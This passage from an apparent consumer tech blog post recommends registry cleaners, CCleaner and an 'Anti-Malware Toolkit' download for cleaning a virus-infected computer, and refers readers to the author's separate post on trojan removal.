Next you need a registry scanner, to fix your infected computer,Viruses often copy their algorithm into the registry entry.So you are only 50% done after you delete the virus)
Well there are many registry cleaners availible such as

1.Eusing Free Registry Cleaner/scanner
2.Registry fix
3.Auslogics registry cleaner(My recommendation)

Trojan horse removal:

For this you can read my post on "Trojan horse removal"

Ccleaner:

After that you can download CCleaner and optimize your computer speed by deleting unwanted registry and internet tracing cookies and temporary files.

Bonus:Anti-Malware Toolkit - a program that automatically downloads all of the recommended programs to help users clean their computers and have them running at peak performance again.
Help keep your computer safe, secure and clean from malware - get the Anti-Malware Toolkit today!

Download anti malware tool kit here